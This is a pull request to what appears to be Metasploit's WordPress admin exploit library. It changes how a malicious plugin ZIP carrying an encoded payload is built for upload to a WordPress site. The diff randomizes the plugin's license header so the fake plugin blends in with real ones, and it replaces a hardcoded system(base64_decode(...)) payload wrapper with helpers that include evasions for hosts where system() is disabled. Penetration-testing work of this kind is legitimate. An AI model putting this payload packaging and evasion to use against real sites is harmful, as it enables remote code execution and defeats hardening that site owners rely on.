### PR TITLE
Make lib/msf/core/exploit/remote/http/wordpress/admin.rb a tad more portable

### DIFF
--- a/lib/msf/core/exploit/remote/http/wordpress/admin.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/admin.rb
@@ -55,11 +55,21 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin
  * Version: #{Faker::App.semantic_version}
  * Author: #{Faker::Name.name}
  * Author URI: #{Faker::Internet.url}
- * License: GPL2
+ * License: #{['GPLv2', 'GPLv2 or later', 'GPL-2.0-or-later'].sample}
  */
 ?>)
 
-    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
+    php_code = "<?php #{payload.encoded} ?>"
+    if target['Arch'] != ARCH_PHP
+      dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
+      php_code = <<-END_OF_PHP_CODE
+        #{php_preamble(disabled_varname: dis)}
+        $c = base64_decode("#{Rex::Text.encode_base64(payload.encoded)}");
+        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+      END_OF_PHP_CODE
+      php_code = php_code + '?>'
+    end
+
     zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
     zip.add_file(File.join(plugin_name, "#{plugin_name}.php"), plugin_script)
     zip.add_file(File.join(plugin_name, "#{payload_name}.php"), php_code)


### PR DESCRIPTION
- Randomize the license header, based on examples from https://developer.wordpress.org/plugins/plugin-basics/header-requirements/, as plugins developers are likely copy-pasting them in their own plugins.
- Use the php_preamble/php_system_block combo instead of hardcoding system/base64, as `system` might not be available on some WordPress deployments, and the combo has some low-hanging evasions for this case.